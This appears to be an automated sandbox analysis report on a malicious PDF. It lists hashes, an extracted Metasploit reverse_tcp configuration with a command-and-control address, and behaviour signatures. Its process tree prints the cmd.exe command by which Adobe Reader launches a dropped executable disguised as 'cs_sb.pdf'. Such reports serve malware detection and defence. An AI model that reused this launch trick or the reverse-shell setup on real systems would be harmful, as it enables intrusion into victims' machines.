Analysis

  • max time kernel
    140s
  • max time network
    143s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64, arch:x86, image:win7-20240903-en, locale:en-us, os:windows7-x64, system
  • submitted
    25-12-2024 06:07

General

  • Target

    JaffaCakes118_9576d02a063672b2dda3060dc50cada3f1f8766b6986b8b47193e3df8b495c8e.pdf

  • Size

    932KB

  • MD5

    a0f48cf0432e7b21daafffb4f67f5dc4

  • SHA1

    92535d5a12248d620730b64af81c7716e9fccc62

  • SHA256

    9576d02a063672b2dda3060dc50cada3f1f8766b6986b8b47193e3df8b495c8e

  • SHA512

    010b6e06de8aad716287b2ae2dc7426a4493e4a3c891c847d5bd94ccc77055a0aebed6e525696805c30e76bee88c0e39394c7feba2154e5514241771691ab10d

  • SSDEEP

    24576:t/5xFNDwdEpg0Z6NWUzrjheEZjAowHKaEdx6KTmug:5zFND8r0oNWUzrjhmEdxJmh

Malware Config

Extracted

Family

metasploit

Version

windows/reverse_tcp

C2

5.6.7.8:443

Signatures

  • MetaSploit

    Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

  • Metasploit family
  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 2 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • Modifies registry class 31 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of SetWindowsHookEx 4 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe
    "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_9576d02a063672b2dda3060dc50cada3f1f8766b6986b8b47193e3df8b495c8e.pdf"
    1⤵
    • System Location Discovery: System Language Discovery
    • Modifies registry class
    • Suspicious behavior: GetForegroundWindowSpam
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2524
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /Q /C %HOMEDRIVE%&cd %HOMEPATH%&(if exist "Desktop\cs_sb.pdf" (cd "Desktop"))&(if exist "My Documents\cs_sb.pdf" (cd "My Documents"))&(if exist "Documents\cs_sb.pdf" (cd "Documents"))&(if exist "Escritorio\cs_sb.pdf" (cd "Escritorio"))&(if exist "Mis Documentos\cs_sb.pdf" (cd "Mis Documentos"))&(start cs_sb.pdf) Could not open PDF: Something's wrong
      2⤵
      • Loads dropped DLL
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2812
      • \??\c:\Users\Admin\Documents\cs_sb.pdf
        cs_sb.pdf
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        PID:2616

Network

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\Admin\AppData\Roaming\Adobe\Acrobat\9.0\SharedDataEvents

    Filesize

    3KB

    MD5

    7e9707461d78dafc6215df5b63194885

    SHA1

    92864663e2b6825835cbbadb455f7b0369a7b4ed

    SHA256

    776a84b57e7c57c6c6f4537387ee415c70eb796433bbf7baba00358f026d964f

    SHA512

    64e07cfefcf5f59d70463914234db5677a20f265c2869a5ed08d225ced2d0c5fef69b7978020ac3cf0005a1c891f58062a41c8bc746b7f3857715e26a0013aa7

  • C:\Users\Admin\Documents\cs_sb.pdf

    Filesize

    72KB

    MD5

    2a046253dbeefd2ec9ac226a31f9665f

    SHA1

    2b6c9d9a9d2b75772ce14f875791fb4fa9417429

    SHA256

    335563701953af482f55eb521dce276a2fb1f737a041261ca823ac62d75ac7c3

    SHA512

    ae7e0cab9aef11bb2c14aad3329210c005e7b78b9c69bfe2b232b16cc870a233c9b6731e142bf8412b40d1cc83aaf9cd306fc4709d53d1cfed7b32699460bbff